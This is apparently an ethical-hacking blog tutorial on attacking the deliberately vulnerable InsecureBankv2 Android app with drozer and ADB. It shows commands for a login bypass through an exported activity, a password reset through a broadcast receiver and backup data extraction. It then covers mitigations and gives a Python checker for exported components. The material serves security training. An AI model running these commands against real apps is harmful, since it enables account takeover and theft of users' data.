Sat. Oct 19th, 2019

Ethical Hacking Playground

hacking is curiosity

How To Test Android Application Security Using Drozer & InsecureBankv2?


Let’s Begin!

First of all, we need to forward the connection to the drozer agent, so run this command using the Android Debug Bridge (ADB):

adb forward tcp:31415 tcp:31415

Funny: 31415 are the first digits of the mathematical constant pi.

Now connect to drozer.

drozer console connect


How to Bypass the Login Screen?

To bypass the login screen we first need to get the activity info.

run app.activity.info -a com.android.insecurebankv2

Now let's bypass it!

run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.PostLogin


Success! It should now log you in.

How to Reset the Password Through SMS?

If you want to reset the password through SMS, type in this command here.

adb shell am broadcast -n com.android.insecurebankv2/.MyBroadCastReceiver --es phonenumber <phone-number> --es newpass <new-password>


Awesome! It should send you an SMS with the new password.

How to Reveal Sensitive Information From Backup?

First, we need to perform a backup, so type in this command:

adb backup -f backup.ab com.android.insecurebankv2

Now we need to unpack this backup file using the Android Backup Extractor tool.

https://sourceforge.net/projects/adbextractor/

java -jar abe.jar unpack backup.ab backup.zip

When we unzip backup.zip, there should be some juicy information.

Hope you enjoyed this information,

Remember practice is the key to success.

Mitigations:

Let's first decode the APK (the project ships it as InsecureBankv2.apk) and retrieve the Manifest file.

apktool decode InsecureBankv2.apk

Open the AndroidManifest.xml in a text editor and you will see that the majority of the Activities and the BroadcastReceiver have android:exported set to true; this is what makes the application vulnerable, because any other app on the device can start those components or send them broadcasts.

Example:

<receiver android:exported="true" android:name="com.android.insecurebankv2.MyBroadCastReceiver">

Make sure that android:exported is set to false for every component that does not need to be reachable from other apps.
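To make the manifest review above repeatable, here is a small checker (added here, not part of the original post or of the InsecureBankv2 project) that lists every component another app can reach: those with android:exported="true", and those that declare an intent-filter without an explicit android:exported, which are implicitly exported on Android versions before 12. The sample manifest is constructed for the example and only borrows the PostLogin and MyBroadCastReceiver names from the post; LoginActivity and SyncService are assumed names.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample manifest (not the real InsecureBankv2 manifest).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.android.insecurebankv2">
  <application>
    <activity android:name="com.android.insecurebankv2.LoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:exported="true"
              android:name="com.android.insecurebankv2.PostLogin"/>
    <receiver android:exported="true"
              android:name="com.android.insecurebankv2.MyBroadCastReceiver"/>
    <service android:exported="false"
             android:name="com.android.insecurebankv2.SyncService"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def find_exposed_components(manifest_xml):
    """Return (tag, name, reason) for each component reachable by other apps.

    Components guarded by android:permission are skipped, since a caller
    would need to hold that permission to reach them.
    """
    root = ET.fromstring(manifest_xml)
    exposed = []
    for comp in root.find("application"):
        if comp.tag not in ("activity", "receiver", "service", "provider"):
            continue
        if _attr(comp, "permission"):
            continue
        name = _attr(comp, "name")
        exported = _attr(comp, "exported")
        if exported == "true":
            exposed.append((comp.tag, name, "exported=true"))
        elif exported is None and comp.find("intent-filter") is not None:
            exposed.append((comp.tag, name, "implicit export via intent-filter"))
    return exposed


if __name__ == "__main__":
    for tag, name, reason in find_exposed_components(SAMPLE_MANIFEST):
        print("%-8s %-55s %s" % (tag, name, reason))
```

The launcher activity is expected to show up (it must be exported to appear in the launcher); everything else in the list is a candidate for android:exported="false" or for an android:permission guard.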
